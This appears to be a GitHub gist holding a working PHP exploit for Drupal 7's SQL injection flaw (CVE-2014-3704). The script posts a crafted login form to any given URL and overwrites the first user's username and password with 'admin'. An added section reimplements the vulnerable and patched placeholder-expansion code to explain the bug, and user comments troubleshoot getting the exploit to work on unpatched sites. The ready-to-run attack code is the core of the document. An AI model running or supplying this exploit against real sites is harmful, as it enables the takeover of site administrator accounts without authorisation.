
Exploiting Drupal 7's SQL injection vulnerability (SA-CORE-2014-005, CVE-2014-3704, fixed in Drupal 7.32) to change the admin user's (uid 1) username and password. http://milankragujevic.com/post/66
<?php
/********************************************************
* Drupal 7 SQL Injection vulnerability demo
* Created by Milan Kragujevic (of milankragujevic.com)
* Read more at http://milankragujevic.com/post/66
* This will change the first user's (uid 1) username to admin
* and their password to admin
* Change $url to the website URL
********************************************************/
$url = '[URL HERE]'; // URL of the website, with trailing slash (http://domain.com/)

// Drupal 7 password hash for "admin" (the same string the original gist uses).
$hash = '$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g';

// The injection rides in the *key* of the name[] array: Drupal 7.31's placeholder
// expansion copies array keys straight into the SQL placeholder list, so
// "0 ;update users ..." becomes part of the query text and "#" comments out the rest.
$post_data = "name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'" . urlencode($hash) . "'+where+uid+%3D+'1';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
$params = array(
    'http' => array(
        'method'  => 'POST',
        // Send a User-Agent explicitly: PHP's stream wrapper sends none by default
        // and some hosts reject requests without one.
        'header'  => "Content-Type: application/x-www-form-urlencoded\r\n" .
                     "User-Agent: Mozilla/5.0\r\n",
        'content' => $post_data,
        // Return the response body even on a non-2xx status instead of FALSE.
        'ignore_errors' => true,
    )
);
$ctx = stream_context_create($params);
// Second argument is use_include_path (bool); the original passed null.
$data = file_get_contents($url . '?q=node&destination=node', false, $ctx);
// The array submitted as "name" triggers a PHP mb_strlen() warning during form
// validation; it only reaches the response body when the target has display_errors
// on, so its absence does not prove the site is patched.
if ($data && stristr($data, 'mb_strlen() expects parameter 1 to be string')) {
    echo "Success! Log in with username \"admin\" and password \"admin\" at {$url}user/login";
} else {
    echo "Error! Either the website isn't vulnerable, or your Internet isn't working. ";
}
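How the key of the name[] array ends up inside the SQL, as an added example that is not part of the gist: both functions below are re-implementations modelled on DatabaseConnection::expandArguments() in Drupal 7's includes/database/database.inc, one as shipped in 7.31 and one with the 7.32 fix (array_values() in the inner loop). The login query string, the $post array (built inline to match what PHP's form parsing produces from the gist's POST body) and the function names are constructed for this example; only the expansion step is reproduced, not the rest of the database layer.

```php
<?php
// Added example (not the gist's code): why name[...] array keys reach the SQL.
// Modelled on DatabaseConnection::expandArguments() in Drupal 7's
// includes/database/database.inc. Function names, the query string and the
// $post array are constructed for this example.

/**
 * Drupal 7.31 and earlier: a placeholder bound to an array is expanded into
 * ":name_<key>" for every element, and <key> is the attacker-controlled array
 * key, which preg_replace() splices into $query without any escaping.
 */
function expand_arguments_vulnerable($query, array $args) {
    foreach (array_filter($args, 'is_array') as $key => $data) {
        $new_keys = array();
        foreach ($data as $i => $value) {            // $i comes straight from the request
            $new_keys[$key . '_' . $i] = $value;
        }
        $query = preg_replace('#' . $key . '\b#', implode(', ', array_keys($new_keys)), $query);
        unset($args[$key]);
        $args += $new_keys;
    }
    return array($query, $args);
}

/**
 * Drupal 7.32 (SA-CORE-2014-005): array_values() renumbers the elements, so
 * only 0, 1, 2, ... can ever appear in the generated placeholder names.
 */
function expand_arguments_fixed($query, array $args) {
    foreach (array_filter($args, 'is_array') as $key => $data) {
        $new_keys = array();
        foreach (array_values($data) as $i => $value) {   // $i is now always an int
            $new_keys[$key . '_' . $i] = $value;
        }
        $query = preg_replace('#' . $key . '\b#', implode(', ', array_keys($new_keys)), $query);
        unset($args[$key]);
        $args += $new_keys;
    }
    return array($query, $args);
}

// Constructed input: PHP's form parsing turns the gist's body
//   name[0 ;update users ... ;;#  ]=test3&name[0]=test
// into this array. The first key is the whole injected statement.
$hash = '$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g';
$post = array(
    'name' => array(
        "0 ;update users set name='admin' , pass = '" . $hash . "' where uid = '1';;#  " => 'test3',
        0 => 'test',
    ),
);

// Shape of the user-login lookup that receives the submitted name.
$query = "SELECT * FROM {users} WHERE name = :name AND status = 1";
$args  = array(':name' => $post['name']);

list($q_vuln, $a_vuln) = expand_arguments_vulnerable($query, $args);
list($q_fix,  $a_fix)  = expand_arguments_fixed($query, $args);

echo "7.31 query: $q_vuln\n";                         // UPDATE is now part of the SQL text
echo "7.32 query: $q_fix\n";                          // malformed placeholder list, no injection
echo "7.32 args : " . json_encode($a_fix) . "\n";    // attacker text only in bound values
```

Run it with php and compare the two query lines: in the 7.31 output the placeholder list is ":name_0 ;update users set ... ;;#  , :name_0", so the UPDATE runs as part of the login lookup and "#" comments away the rest of the original statement. In the 7.32 output the list is ":name_0, :name_1", which the database rejects as malformed, but the attacker's text now exists only as bound parameter values. The same trust-in-keys pattern is worth checking for in any code that builds placeholder names from user-supplied array keys.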
zohar commented Oct 17, 2014

I tried this on several non-patched Drupal 7 sites and always got an error.

milankragujevic commented Oct 19, 2014

Did you enter the URL correctly? ("http://domain.com/") Maybe the website is using CloudFlare or forbids empty User-Agent headers... Also try logging in, if the website has errors disabled it might indicate it's not vulnerable when in fact it is.

McBochi commented Oct 20, 2014

This approach seems quite interesting to me, but would you mind presenting a similar "less destructive" version of this exploit/test?

jordanlgraham commented Oct 20, 2014

My $data variable comes back empty using this code, and I'm entering the url correctly using my dev server and a 7.31 site that I maintain.

milankragujevic commented Oct 21, 2014

@McBochi I'm working on it. I'll update the blog post if I discover something.
@jordanlgraham Please "echo $url . '?q=node&destination=node';" and open the output URL in the browser. Maybe you're simply not entering the URL correctly, or PHP is being blocked by some other means. Turn on error_reporting and display_errors. I can't reproduce the issue.

jordanlgraham commented Oct 21, 2014

@milankragujevic thanks - omitted "http://" in my url - now much data, but the data is the html of the site at $url. The string 'mb_strlen() expects parameter 1 to be string' is not in the $data. If it's helpful, echo $ctx outputs "Resource id #2".

milankragujevic commented Oct 25, 2014

Not really. You should try logging in to the website... If the website has PHP display_errors turned off, you won't see the error. There is no way to verify other than to try and log in.
